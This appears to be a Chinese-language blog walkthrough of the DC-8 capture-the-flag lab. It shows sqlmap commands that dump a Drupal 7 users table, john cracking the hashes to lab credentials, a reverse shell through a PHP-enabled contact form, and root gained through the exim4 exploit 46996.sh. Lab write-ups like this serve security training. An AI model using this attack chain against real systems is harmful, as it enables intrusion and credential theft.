这个挑战有点像一个混合体,既是一个实际的挑战,又是一个 "概念证明",即在Linux上安装和配置的双因素认证是否可以防止Linux服务器被利用。


环境搭建

攻击机kali2021,网络环境NAT

信息收集


主机发现

arp-scan -l
确定靶机ip为192.168.207.145

端口探测

nmap
目标把及开放22openssh端口,和80web端口,Drupal 7框架CMS

Web访问

web
sql报错
应该是注入点,直接上sqlmap上跑一下

SQLmap扫描


sqlmap -u "http://192.168.207.145/?nid=1" --dbs

dbs
查看d7db库下面的所有表

sqlmap -u "http://192.168.207.145/?nid=1" -D "d7db" -tables

tables
查看users表下的所有字段

sqlmap -u "http://192.168.207.145/?nid=1" -D "d7db" -tables -T "users" --columns

columns
查看name,pass字段的值

sqlmap -u "http://192.168.207.145/?nid=1" -D "d7db" -tables -T "users" -C "name,pass" --dump

name/pass
使用john解密name,pass的值
解密
john/turtle

后台登陆

john
只能登陆john
php code
发现一处支持php代码的地方
尝试使用nc反弹shell

反弹shell


反弹shell
回到contact us随便写点东西
contact us
回到kali,反弹成功
shell

权限提升


查看suid权限

suid
exim4存在可利用漏洞
查看exim4可利用漏洞
searchsploit
将脚本下载到dc8/tmp
46996.sh
更改权限,和修改ff,否则不能运行

chmod +x 46996.sh
:set ff=unix

使用第二种netcat提权成功
提权
well done

最后修改:2021 年 08 月 13 日 08 : 33 AM
如果觉得我的文章对你有用,请随意赞赏